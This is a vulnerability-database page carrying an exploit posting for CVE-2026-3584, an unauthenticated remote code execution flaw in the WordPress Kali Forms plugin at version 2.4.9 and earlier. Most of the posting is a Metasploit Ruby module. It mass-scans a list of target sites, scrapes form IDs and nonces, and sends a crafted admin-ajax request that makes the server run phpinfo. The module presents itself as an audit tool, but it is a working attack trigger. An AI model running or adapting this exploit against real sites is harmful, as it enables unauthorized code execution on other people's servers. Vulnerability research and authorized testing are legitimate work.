Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 WordPress Kali Forms 2.4.9 Remote Code Execution

🗓️ 20 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 77 Views

WordPress Kali Forms 2.4.9 RCE assessment module for auditing sites and detecting remote code execution.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-3584
20 Mar 202621:25
attackerkb
Circl		CVE-2026-3584
20 Mar 202622:17
circl
CNNVD		WordPress plugin Kali Forms 代码注入漏洞
20 Mar 202600:00
cnnvd
CVE		CVE-2026-3584
20 Mar 202621:25
cve
Cvelist		CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process
20 Mar 202621:25
cvelist
EUVD		EUVD-2026-13814
21 Mar 202600:31
euvd
GithubExploit		Exploit for CVE-2026-3584
25 Mar 202609:21
githubexploit
Nuclei		WordPress Kali Forms <= 2.4.9 - Remote Code Execution
3 Jun 202606:04
nuclei
NVD		CVE-2026-3584
20 Mar 202622:16
nvd
Patchstack		WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability
23 Mar 202610:14
patchstack
Rows per page
==================================================================================================================================
    | # Title     : WordPress Kali Forms 2.4.9 Remote Code Execution Assessment                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://fr.wordpress.org/plugins/kali-forms/                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module is designed for security auditing of WordPress sites using the Kali Forms plugin, focusing on detecting potential exposure to a Remote Code Execution (RCE) condition.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    require 'set'
    require 'json'
    require 'uri'
    require 'fileutils'
    require 'thread'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress Kali Forms - ',
            'Description' => %q{
             version with MSF compatibility improvements:
                     },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              [Msf::Reference::CVE, '2026-3584']
            ]
          )
        )
    
        register_options([
          OptInt.new('THREADS', [true, 'Concurrent targets', 10]),
          OptPath.new('TARGETS_FILE', [true, 'List of target hosts']),
          OptInt.new('TIMEOUT', [true, 'HTTP timeout', 15]),
          OptString.new('EXPLOIT_LEVEL', [true, 'SAFE_AUDIT / RCE_ONLY / FULL', 'SAFE_AUDIT'])
        ])
      end
    
      def setup
        @lock = Mutex.new
        @stats = { scanned: 0, vulnerable: 0, failed: 0 }
    
        @loot_dir = File.join(Msf::Config.loot_directory, "kali_forms_#{Time.now.to_i}")
        FileUtils.mkdir_p(@loot_dir)
      end
    
      def normalize_target_url(target, path = nil)
        return nil if target.nil?
    
        base = target =~ /^https?:\/\// ? target : "http://#{target}"
        base = base.chomp('/')
    
        return base if path.nil?
        "#{base}/#{path.sub(/^\//, '')}"
      end
    
      def update_stats(key)
        @lock.synchronize { @stats[key] += 1 }
      end
    
      def run
        targets = File.readlines(datastore['TARGETS_FILE'])
                      .map(&:strip)
                      .reject { |l| l.empty? || l.start_with?('#') }
    
        queue = Queue.new
        targets.each { |t| queue << t }
    
        print_status("Starting scan on #{targets.length} targets")
    
        datastore['THREADS'].times.map do
          framework.threads.spawn("kali-scanner", false) do
            loop do
              begin
                target = queue.pop(true)
              rescue ThreadError
                break
              end
    
              scan_target(target)
            end
          end
        end.each(&:join)
    
        print_status("Done. Scanned=#{@stats[:scanned]} Vulnerable=#{@stats[:vulnerable]}")
      end
    
      def scan_target(target)
        update_stats(:scanned)
    
        base = normalize_target_url(target)
        return unless base
    
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_target_url(base, '/'),
          'timeout' => datastore['TIMEOUT']
        )
    
        unless res&.code == 200
          update_stats(:failed)
          return
        end
    
        if res.body =~ /kaliforms|KaliFormsObject/i
          print_good("[+] Potential target: #{target}")
    
          if datastore['EXPLOIT_LEVEL'] == 'SAFE_AUDIT'
            return
          end
    
          form_ids = res.body.scan(/data-id=["'](\d+)["']/i).flatten.uniq
          nonce = res.body[/ajax_nonce["']\s*:\s*["']([a-f0-9]+)["']/i, 1]
    
          return if form_ids.empty? || nonce.nil?
    
          form_ids.each do |fid|
            if test_rce(base, fid, nonce)
              update_stats(:vulnerable)
              print_good("[!!!] Vulnerable: #{target} FormID=#{fid}")
    
              report_vuln(
                host: URI.parse(base).host,
                name: 'Kali Forms RCE',
                refs: [Msf::Reference.new('CVE', '2026-3584')],
                info: "Form ID #{fid}"
              )
            end
          end
        end
      rescue => e
        update_stats(:failed)
        vprint_error("#{target} => #{e.message}")
      end
    
      def test_rce(base, fid, nonce)
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => normalize_target_url(base, '/wp-admin/admin-ajax.php'),
          'vars_post' => {
            'action' => 'kaliforms_form_process',
            'data[formId]' => fid,
            'data[nonce]' => nonce,
            'data[thisPermalink]' => 'phpinfo'
          },
          'timeout' => datastore['TIMEOUT']
        )
    
        res&.body&.include?('PHP Version')
      rescue
        false
      end
    end
    
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Apr 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.19.8
EPSS0.28725
SSVC
WordPressKali FormsRemote code executionSecurity auditingVulnerability testing
77